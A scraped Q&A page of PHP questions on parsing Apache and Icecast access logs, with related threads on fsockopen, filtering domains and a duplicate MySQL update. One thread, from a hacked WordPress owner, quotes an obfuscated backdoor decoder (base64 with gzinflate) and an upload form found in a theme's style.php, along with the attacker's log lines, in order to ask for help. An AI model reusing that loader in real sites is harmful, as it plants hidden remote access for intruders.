Parsing raw apache logs - php

I need some PHP code for parsing raw Apache logs.
In particular, I want to count how many times mode=search is requested and collect the term used for each search. Here is an example:
207.46.195.228 - - [30/Apr/2010:03:24:26 -0700] "GET /index.php?mode=search&term=AE1008787E0174 HTTP/1.1" 200 13047 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.81.200.167 - - [30/Apr/2010:04:21:43 -0700] "GET /index.php?mode=search&term=WH2002D-YYH HTTP/1.1" 200 12079 "http://www.mysite.com/SearchGBY.php?page=81" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; WinuE v6)"
212.81.200.167 - - [30/Apr/2010:04:21:44 -0700] "GET /file_uploads/banners/banner.swf HTTP/1.1" 200 50487 "-" "contype"
66.249.68.168 - - [30/Apr/2010:04:21:45 -0700] "GET /index.php?mode=search&term=WH2002D-YYH HTTP/1.1" 200 12079 "-" "Mediapartners-Google"

I recently wrote a very crude parser for this:
$ignore = array('css', 'png', 'gif', 'jpg', 'jpeg', 'js', 'ico');
$f = fopen('access_log', "r");
if(!$f) die("Failed to open log for reading.");
// read line by line; fgets() returns false at end of file
while (($buff = fgets($f, 4096)) !== false) {
$parts = explode(' ', $buff);
// skip malformed lines that have no request path
if(!isset($parts[6])) continue;
// skip static assets (end() needs a real variable, not a function result)
$segments = explode('.', $parts[6]);
if(in_array(end($segments), $ignore)) continue;
$domain = trim(end($parts));
// http method
$http_method = substr($parts[5], 1);
if($http_method != 'GET' && $http_method != 'POST') continue;
// parse out the date
list($d, $m, $y) = explode('/', substr($parts[3], 1));
$y = substr($y, 0, 4);
$time = strtotime("{$d} {$m} {$y}");
print "{$time} {$parts[0]} {$http_method} {$parts[6]} $domain\n";
}
fclose($f);
$parts[6] should contain the part you're interested in (the resource that was accessed). This should get you on your way...

As easy as using regular expressions: http://php.net/manual/en/book.regex.php
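For the specific question (how often mode=search occurs and which terms were used), a minimal sketch along those lines might look like the following. It assumes the log lines have the same layout as the samples in the question; the function name countSearchTerms is made up for illustration and is not part of any library.

```php
<?php
// Hypothetical helper: counts search requests and tallies the terms used.
// Assumes a request line such as "GET /index.php?mode=search&term=... HTTP/1.1".
function countSearchTerms(iterable $lines): array
{
    $total = 0;
    $terms = [];
    foreach ($lines as $line) {
        // Capture the requested URL from the quoted request line.
        if (!preg_match('/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
            continue;
        }
        $query = parse_url($m[1], PHP_URL_QUERY);
        if (!is_string($query)) {
            continue; // no query string, e.g. a static file
        }
        parse_str($query, $params);
        if (($params['mode'] ?? null) !== 'search') {
            continue;
        }
        $total++;
        // Ignore array-style parameters such as term[]=x.
        $term = is_string($params['term'] ?? null) ? $params['term'] : '';
        $terms[$term] = ($terms[$term] ?? 0) + 1;
    }
    arsort($terms); // most frequent terms first
    return ['total' => $total, 'terms' => $terms];
}

// Three of the sample lines from the question.
$sample = [
    '207.46.195.228 - - [30/Apr/2010:03:24:26 -0700] "GET /index.php?mode=search&term=AE1008787E0174 HTTP/1.1" 200 13047 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"',
    '212.81.200.167 - - [30/Apr/2010:04:21:44 -0700] "GET /file_uploads/banners/banner.swf HTTP/1.1" 200 50487 "-" "contype"',
    '66.249.68.168 - - [30/Apr/2010:04:21:45 -0700] "GET /index.php?mode=search&term=WH2002D-YYH HTTP/1.1" 200 12079 "-" "Mediapartners-Google"',
];
$stats = countSearchTerms($sample);
print_r($stats);
```

For a real log file you could pass new SplFileObject('access_log') instead of the array, since the function accepts anything iterable line by line.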

Related

Why doesn't fsockopen work when my own server calls the file?

I need a little help.
We have some test code that uses fsockopen:
<?php
//require_once "../common.php";
$url = "https://xxxxx/xxxx/fsockopen_called_file.php";
$close = true;
echo "<pre>";
error_log("\n\n");
trigger_error("1. calling fsockopen url: ".$url);
$result = call_url($url, $close);
trigger_error("2. result: ".var_export($result, true)."\n\n");
function call_url($url, $close = TRUE) {
$user_agent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36";
$parts = parse_url($url);
if (@$parts["scheme"] === "https" && (!@$parts["port"] || $parts["port"] == 80)) {
$parts["port"] = 443;
$parts["scheme"] = "ssl";
}
$out = "GET ".$parts["path"]." HTTP/1.1\r\n";
$out.= "Host: ".$parts["host"]."\r\n";
$out.= "User-Agent: ".$user_agent."\r\n";
$out.= "Content-Length: 0\r\n";
if ($close) { $out.= "Connection: Close\r\n"; }
$out.= "\r\n";
$fsock_url = ($parts["scheme"] !== "http"? ($parts["scheme"]."://") : "").$parts["host"];
$fp = fsockopen($fsock_url, isset($parts["port"])? $parts["port"] : 80, $errno, $errstr, 30);
fwrite($fp, $out);
$result = "";
//If we close the connection, we do not wait for the response.
if (!$close) {
while (!feof($fp)) {
$result .= fgets($fp, 128);
}
}
fclose($fp);
if (is_bool($fp) && !$fp && !$errno) {
//fsockopen returned false and the errno variable holds no error code.
$errno = 1;
$errstr = "Could not connect to the server: ".$url." => ".$fsock_url;
}
return ["errno" => $errno, "errstr" => $errstr, "result" => $result];
}
My problem is that the file the code calls (fsockopen_called_file.php) does not appear in the access log.
Access log:
x.x.x.x - [19/Jun/2022:20:20:32 +0200] "GET /xxx/fsockopen.php HTTP/1.1" 200 4890 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
That's it. The request for fsockopen_called_file.php doesn't appear; it is as if the call never happens.
Server info:
Ubuntu 20.04
Apache 2.4.54-1+ubuntu20.04.1+deb.sury.org+1
PHP 7.4 1:7.4.30-1+ubuntu20.04.1+deb.sury.org+1
I tried the following:
- turning the firewall off
- building an identical server with the same options, where it worked
Does anyone have any ideas that could help me?
Thanks,
Balee

Log parser - extend

I have an Icecast access log like this:
11.11.111.11 - 5229 [08/May/2018:11:43:38 +0200] "GET /chillout_delicate.ogg HTTP/1.1" 200 36256 "-" "Dalvik/1.6.0 (Linux; U; Android 4.3; GT-I9300 Build/JSS15J)" 0
111.111.11.111 - 2510/14 [08/May/2018:11:43:39 +0200] "GET /pub3.ogg HTTP/1.1" 200 36467 "-" "Dalvik/1.6.0 (Linux; U; Android 4.4.2; GT-P5200 Build/KOT49H)" 1
The first value is the IP. The second one, after the -, is the user name, usually a number such as 2510/14 or 234. I found a PHP file that I am trying to customize.
<?php
$ac_arr = file('/var/log/icecast2/access.log');
$astring = join("", $ac_arr);
$astring = preg_replace("/(\n|\r|\t)/", "", $astring);
$records = preg_split("/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/", $astring, -1, PREG_SPLIT_DELIM_CAPTURE);
$sizerecs = sizeof($records);
// now split into records
$i = 1;
$each_rec = 0;
while($i<$sizerecs) {
$ip = $records[$i];
$all = $records[$i+1];
// parse other fields
preg_match("/\[(.+)\]/", $all, $match);
$access_time = $match[1];
$all = str_replace($match[1], "", $all);
preg_match("/\"[A-Z]{3,7} (.[^\"]+)/", $all, $match);
$http = $match[1];
$link = explode(" ", $http);
$all = str_replace("\"[A-Z]{3,7} $match[1]\"", "", $all);
preg_match("/([0-9]{3})/", $all, $match);
$success_code = $match[1];
$all = str_replace($match[1], "", $all);
preg_match("/\"(.[^\"]+)/", $all, $match);
$ref = $match[1];
$all = str_replace("\"$match[1]\"", "", $all);
preg_match("/\"(.[^\"]+)/", $all, $match);
$browser = $match[1];
$all = str_replace("\"$match[1]\"", "", $all);
preg_match("/([0-9]+\b)/", $all, $match);
$bytes = $match[1];
$all = str_replace($match[1], "", $all);
print("<br>IP: $ip<br>Access Time: $access_time<br>Page: $link[0]<br>Type: $link[1]<br>Success Code: $success_code<br>Bytes Transferred: $bytes<br>Referer: $ref <br>Browser: $browser<hr>");
// advance to next record
$i = $i + 2;
$each_rec++;
}
?>
It gives me these results:
IP: xxx.xxx.xx.xx
Access Time: 08/May/2018:11:58:19 +0200
Page: /restaurant.ogg
Type: HTTP/1.1
Success Code: 153
Bytes Transferred: 8
Referer: GET /restaurant.ogg HTTP/1.1
Browser: Dalvik/1.6.0 (Linux; U; Android 4.1.2; IdeaTabA1000-F Build/JZO54K)
I have little experience with regex. How can I add the user name to these results? Please help.
Try this regex:
https://regex101.com/r/ETKSr3/2
It should parse each line the way I think you want, in one go.
$re = '/(\d+\.\d+\.\d+\.\d+)\s-\s([\d\/]+)\s\[(.*?)\]\s\"(.*?)\s\/(.*?)\s(.*?)\"\s(\d+)\s(\d+).*?\"(\w+.*?)\"\s(\d+)/m';
$str = '11.11.111.11 - 5229 [08/May/2018:11:43:38 +0200] "GET /chillout_delicate.ogg HTTP/1.1" 200 36256 "-" "Dalvik/1.6.0 (Linux; U; Android 4.3; GT-I9300 Build/JSS15J)" 0
111.111.11.111 - 2510/14 [08/May/2018:11:43:39 +0200] "GET /pub3.ogg HTTP/1.1" 200 36467 "-" "Dalvik/1.6.0 (Linux; U; Android 4.4.2; GT-P5200 Build/KOT49H)" 1';
preg_match_all($re, $str, $matches, PREG_SET_ORDER, 0);
// Print the entire match result
var_dump($matches);
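If you would rather print the fields by name, as the original script does, a variant with named groups may be easier to read. This is only a sketch: it assumes every line has exactly the layout of the two samples, and the group names (including trailing for the last number, whose meaning I am not certain of) are my own choice.

```php
<?php
// Named groups make each field, including the user name, addressable by key.
// Assumption: every line follows the layout of the sample lines in the question.
$pattern = '/^(?<ip>\d+\.\d+\.\d+\.\d+) - (?<user>\S+) \[(?<time>[^\]]+)\] '
         . '"(?<method>[A-Z]+) (?<path>\S+) (?<protocol>[^"]+)" '
         . '(?<status>\d{3}) (?<bytes>\d+) "(?<referer>[^"]*)" "(?<agent>[^"]*)" '
         . '(?<trailing>\d+)$/';

$line = '111.111.11.111 - 2510/14 [08/May/2018:11:43:39 +0200] "GET /pub3.ogg HTTP/1.1" 200 36467 "-" "Dalvik/1.6.0 (Linux; U; Android 4.4.2; GT-P5200 Build/KOT49H)" 1';

if (preg_match($pattern, $line, $m)) {
    echo "IP: {$m['ip']}\n";
    echo "User: {$m['user']}\n";
    echo "Access Time: {$m['time']}\n";
    echo "Page: {$m['path']}\n";
    echo "Success Code: {$m['status']}\n";
    echo "Bytes Transferred: {$m['bytes']}\n";
    echo "Referer: {$m['referer']}\n";
    echo "Browser: {$m['agent']}\n";
} else {
    echo "Line did not match the expected layout\n";
}
```

To process the whole file, you could loop over file('/var/log/icecast2/access.log', FILE_IGNORE_NEW_LINES) and apply the same preg_match to each line.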

WordPress vulnerability issue

My WordPress website has just been hacked, and after looking at the logs I saw that they exploited this file: www/wp-content/themes/mytheme/style.php
When I browse to www.mywebsite.com/wp-content/themes/mytheme/style.php I find an input field with a button, so I guess that's where they uploaded their shell script.
function pre_term_name( $wp_kses_data, $wp_nonce ) {
$kses_str = str_replace( array ('%', '*'), array ('/', '='), $wp_kses_data );
$filter = base64_decode( $kses_str );
$md5 = strrev( $wp_nonce );
$sub = substr( md5( $md5 ), 0, strlen( $wp_nonce ) );
$wp_nonce = md5( $wp_nonce ). $sub;
$preparefunc = 'gzinflate';
$i = 0; do {
$ord = ord( $filter[$i] ) - ord( $wp_nonce[$i] );
$filter[$i] = chr( $ord % 256 );
$wp_nonce .= $filter[$i]; $i++;
} while ($i < strlen( $filter ));
return @$preparefunc( $filter );
}
$wp_auth_check = '<form method= "post" action= ""> <input type= "input" name= "_f_wp" value= ""/><input type= "submit" value= ">"/></form>';
How can I fix this vulnerability? Thanks
Logs:
195.211.142.36 - - [19/May/2017:19:00:17 +0100] "POST /wp-content/themes/mytheme/style.php HTTP/1.1" 301 - "http://mywebsite.com/wp-content/themes/mytheme/style.php" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
195.211.142.36 - - [19/May/2017:19:00:18 +0100] "GET /wp-content/themes/mytheme/style.php HTTP/1.1" 200 123 "http://mywebsite.com/wp-content/themes/mytheme/style.php" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
195.211.142.36 - - [19/May/2017:19:00:27 +0100] "GET /TEST777/system.php?ar=test333.zip HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
195.211.142.36 - - [19/May/2017:19:00:33 +0100] "GET /TEST777/test111 HTTP/1.1" 200 270 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
195.211.142.36 - - [19/May/2017:19:00:40 +0100] "GET /wp-content/themes/mytheme/style.php HTTP/1.1" 200 7680 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
That line is where the input would be. The vulnerability would be whatever that is posting to. It appears that the action is blank and so I'd assume there is a jQuery/AJAX call that is stopping the submission and passing the data. That would be where to check. From there you will know where the data is actually being posted and a query is being executed. Check that the query is using PDO and/or the inputs are sanitized.
As a general "helper" with WP security though, I like the Sucuri WP plugin.
You can use WordPress security plugins, for example: WordFence, BulletProof Security, Sucuri Security, iThemes Security, Acunetix WP SecurityScan,
and check these pages: Threats, Security Vulnerabilities

Exclude domains from a match list in a string

I have my server's access logs in a .log file of around 150K lines, and the lines contain URLs. I want to write those URLs to a separate text file, one URL per line.
I want to exclude a few URLs, such as the http://www.google.com bot and http://www.example.com. They are all listed in the array below, and I will be adding more to the list. The excluded URLs start with a domain such as example.com but may carry different paths or query strings, or be the bare domain.
$string = '
166.137.126.16 - - [06/May/2017:02:32:33 +0530] "GET /files/adg3com_crypticpsyche2.mp3 HTTP/1.0" 200 906922 "http://paradiseconcertspresents.com/?dn=content&cn=page&sw=view&page_id=location"
66.249.92.82 - - [06/May/2017:02:32:36 +0530] "GET /wp/autotow/wp-content/uploads/sites/5/locations_bg2.jpg HTTP/1.0" 500 658 "-" "AdsBot-Google (+http://www.google.com/adsbot.html)"
100.6.157.102 - - [06/May/2017:02:32:36 +0530] "GET /files/food_icon1.png HTTP/1.0" 200 3681 "http://totopomex.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X)"
100.6.157.102 - - [06/May/2017:02:32:36 +0530] "GET /files/food_icon3.png HTTP/1.0" 200 4028 "http://totopomex.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X)"
97.83.34.133 - - [06/May/2017:02:32:38 +0530] "GET /files/1920x1200.jpg HTTP/1.0" 404 416 "http://thatsapizzami.com/odds-ends/"
77.49.52.0 - - [06/May/2017:02:32:40 +0530] "GET /files/favicon.png HTTP/1.0" 200 1239 "http://radionotios.gr/"
66.175.153.111 - - [06/May/2017:02:32:45 +0530] "GET /files/pixel_weave.png HTTP/1.0" 404 416 "http://www.mississippisportsmedicine.com/"
66.249.92.82 - - [06/May/2017:02:32:46 +0530] "GET /wp/wp-content/uploads/sites/5/subheader_bg.jpg HTTP/1.0" 500 658 "-" "AdsBot-Google (+http://www.google.com/adsbot.html)"
66.249.92.86 - - [06/May/2017:02:33:06 +0530] "GET /wp/autotow/wp-content/uploads/sites/5/locations_bg2.jpg HTTP/1.0" AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html)"
216.255.37.4 - - [06/May/2017:02:33:09 +0530] "GET /files/food_icon1.png HTTP/1.0" 200 3681 "http://spenglers.com/" "Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G36"
141.70.4.75 - - [06/May/2017:02:33:09 +0530] "GET /wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.0" 200 2251 "http://www.example.com/medical/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:53.0) Gecko/20100101 Firefox/53.0"
141.70.4.75 - - [06/May/2017:02:34:09 +0530] "GET /wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.0" 200 2251 "http://www.example.com/medical/standard-post/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:53.0) Gecko/20100101 Firefox/53.0"
';
// Match all the strings starting with http(s) or www
preg_match_all('((?:https?:|www\.)[^\s]+)', $string, $match);
/**
* The log will not contain exactly the URLs listed here; some may
* carry different query strings. Matching on the domain (with its
* extension) would be good enough.
*/
$exclude_domains = array(
'google' => 'http://www.google.com/adsbot.html',
'example' => 'http://www.example.com/',
'msn' => 'http://www.msn.com/adsbot.html',
'yandex' => 'http://www.yandex.com/adsbot.html',
);
// Excludes duplicate entries
$unique_match = array_unique($match[0]);
// Return each match in a new line
foreach ( $unique_match as $matchlink ){
echo $matchlink ."\n";
}
What do I want to do?
I want to exclude a few domains as described above. I have got as far as extracting the URLs, but I have no idea how to do the exclusion.
<?php
$string = '
166.137.126.16 - - [06/May/2017:02:32:33 +0530] "GET /files/adg3com_crypticpsyche2.mp3 HTTP/1.0" 200 906922 "http://paradiseconcertspresents.com/?dn=content&cn=page&sw=view&page_id=location"
...
';
$logEntries = explode("\n", $string);
foreach ($logEntries as $index => $logEntry) {
if (preg_match("(www\.google\.com|www\.example\.com)", $logEntry) > 0) {
unset($logEntries[$index]);
}
}
// $logEntries now contains remaining entries that do not contain the filtered out domains
foreach ($logEntries as $logEntry) {
echo $logEntry . "\n";
}
You could achieve it like:
$exclude_domains = array(
'google' => 'http://www.google.com/adsbot.html',
'example' => 'http://www.example.com/',
'msn' => 'http://www.msn.com/adsbot.html',
'yandex' => 'http://www.yandex.com/adsbot.html',
);
$regex = '~' . implode('|', array_map("preg_quote", $exclude_domains)) . '~';
// Excludes duplicate entries
$unique_match = array_unique($match[0]);
// Return each match in a new line
foreach ( $unique_match as $matchlink ){
if (!preg_match($regex, $matchlink)) {
echo "$matchlink\n";
}
}
Here, a new regex is built from the domains to be excluded (each passed through preg_quote first). Inside the foreach loop, each link is checked against it.
Another way would be to use negative lookaheads in the original expression.
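The negative-lookahead variant could look roughly like this. It is a sketch under a few assumptions of mine: the exclusions are given as host names rather than full URLs (so subdomains and any path or query string are covered), only http(s) URLs are collected, and the closing double quote of the log field is not part of the URL. The variable names are illustrative.

```php
<?php
// Assumption: exclusions are host names; www.google.com is covered by google.com.
$excludedHosts = ['google.com', 'example.com'];
$alternatives = implode('|', array_map(
    function (string $host): string {
        return preg_quote($host, '~'); // escape dots and the delimiter
    },
    $excludedHosts
));

// The lookahead rejects a URL whose host is, or ends in, an excluded host.
$pattern = '~https?://(?!(?:[^/\s"]+\.)?(?:' . $alternatives . ')(?=[/"\s:?]|$))[^\s"]+~';

// Four of the sample lines from the question.
$log = <<<'LOG'
66.249.92.82 - - [06/May/2017:02:32:36 +0530] "GET /wp/autotow/wp-content/uploads/sites/5/locations_bg2.jpg HTTP/1.0" 500 658 "-" "AdsBot-Google (+http://www.google.com/adsbot.html)"
100.6.157.102 - - [06/May/2017:02:32:36 +0530] "GET /files/food_icon1.png HTTP/1.0" 200 3681 "http://totopomex.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X)"
77.49.52.0 - - [06/May/2017:02:32:40 +0530] "GET /files/favicon.png HTTP/1.0" 200 1239 "http://radionotios.gr/"
141.70.4.75 - - [06/May/2017:02:33:09 +0530] "GET /wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.0" 200 2251 "http://www.example.com/medical/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:53.0) Gecko/20100101 Firefox/53.0"
LOG;

preg_match_all($pattern, $log, $match);
$urls = array_values(array_unique($match[0]));

foreach ($urls as $url) {
    echo $url . "\n";
}
```

Adding another domain is then a matter of appending its host name to $excludedHosts. To write the result to a text file instead of echoing it, file_put_contents with implode("\n", $urls) should do.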

PHP: MySQL query duplicating update for no reason

The code below is first the client code, then the class file.
For some reason the 'deductTokens()' method is being called twice, thus charging the account double.
I've been programming all night, so I may just need a second pair of eyes:
if ($action == 'place_order') {
if ($_REQUEST['unlimited'] == 200) {
$license = 'extended';
} else {
$license = 'standard';
}
if ($photograph->isValidPhotographSize($photograph_id, $_REQUEST['size_radio'])) {
$token_cost = $photograph->getTokenCost($_REQUEST['size_radio'], $_REQUEST['unlimited']);
$order = new ImageOrder($_SESSION['user']['id'], $_REQUEST['size_radio'], $license, $token_cost);
$order->saveOrder();
$order->deductTokens();
header('location: account.php');
} else {
die("Please go back and select a valid photograph size");
}
}
######CLASS CODE#######
<?php
include_once('database_classes.php');
class Order {
protected $account_id;
protected $cost;
protected $license;
public function __construct($account_id, $license, $cost) {
$this->account_id = $account_id;
$this->cost = $cost;
$this->license = $license;
}
}
class ImageOrder extends Order {
protected $size;
public function __construct($account_id, $size, $license, $cost) {
$this->size = $size;
parent::__construct($account_id, $license, $cost);
}
public function saveOrder() {
//$db = Connect::connect();
//$account_id = $db->real_escape_string($this->account_id);
//$size = $db->real_escape_string($this->size);
//$license = $db->real_escape_string($this->license);
//$cost = $db->real_escape_string($this->cost);
}
public function deductTokens() {
$db = Connect::connect();
$account_id = $db->real_escape_string($this->account_id);
$cost = $db->real_escape_string($this->cost);
$query = "UPDATE accounts set tokens=tokens-$cost WHERE id=$account_id";
$result = $db->query($query);
}
}
?>
When I die("$query"); directly after the query, it's printing the proper statement, and when I run that query within MySQL it works perfectly.
$action = $_REQUEST['action'];
account.php is just a list of orders; it never calls downloads.php. I just tried commenting out the redirect, but I have the same problem. I don't understand how it is getting called twice: the die statements show the right query, and the script doesn't reload itself.
Here are my apache access logs:
71.*** - - [22/May/2010:13:14:35 +0000] "POST /download.php?action=confirm_download&photograph_id=122 HTTP/1.1" 200 1951 "http://***.com/viewphotograph.php?photograph_id=122" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
71.*** - - [22/May/2010:13:14:36 +0000] "GET /download.php?action=place_order&photograph_id=122&size_radio=xsmall&unlimited=0 HTTP/1.1" 302 453 "http://*** .com/download.php?action=confirm_download&photograph_id=122" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
71.*** - - [22/May/2010:13:14:36 +0000] "GET /download.php?action=place_order&photograph_id=122&size_radio=xsmall&unlimited=0 HTTP/1.1" 302 453 "http://*** .com/download.php?action=confirm_download&photograph_id=122" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
71.*** - - [22/May/2010:13:14:36 +0000] "GET /account.php HTTP/1.1" 200 2626 "http://***.com/download.php?action=confirm_download&photograph_id=122" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
I understand there's obviously something wrong here. But I can't figure out where the second request is coming from.
The line:
header('location: account.php');
Forwards the browser, but doesn't end the PHP script.
This might be fine, since the code snippet you gave doesn't "do" anything after this line.
Another option might be a double-click
If you double-click on the submit button, the form will be sent twice.
We used some JavaScript to disable the submit button after the first click.
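Disabling the button only helps on the client side. A different, server-side technique is a one-time token, so that a repeated request cannot deduct tokens again. The following is only a sketch of that idea, not the code we used: the function names are made up, and a plain array stands in for $_SESSION so the example runs on its own.

```php
<?php
// Hypothetical helpers; $store stands in for $_SESSION in this sketch.

// Creates a random token and remembers it as unused.
function issueOrderToken(array &$store): string
{
    $token = bin2hex(random_bytes(16));
    $store['order_tokens'][$token] = true;
    return $token;
}

// Returns true only the first time a given token is presented.
function consumeOrderToken(array &$store, string $token): bool
{
    if (!isset($store['order_tokens'][$token])) {
        return false; // unknown or already used
    }
    unset($store['order_tokens'][$token]);
    return true;
}

$session = [];                       // in a real page this would be $_SESSION
$token = issueOrderToken($session);  // embed this in the confirmation form or link

$first = consumeOrderToken($session, $token);   // first request: place the order
$second = consumeOrderToken($session, $token);  // duplicate request: skip the deduction
var_dump($first, $second);
```

In the place_order branch you would then call saveOrder() and deductTokens() only when the token check returns true.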
Another long shot, but it happened to me once in Firefox - doubled page executions, resulting in doubled inserts and updates - close your browser and restart.
I know this will sound strange, but make sure you don't have a tag with an empty src="" attribute, or any CSS style referring to an empty URL (like background: url();), on the page around the code that runs twice. Some browsers resolve an empty URL to the current page and request it a second time.
Read about some trouble this may cause here: http://hi.baidu.com/zhenyk/blog/item/38a1051fc63b96c3a686698f.html
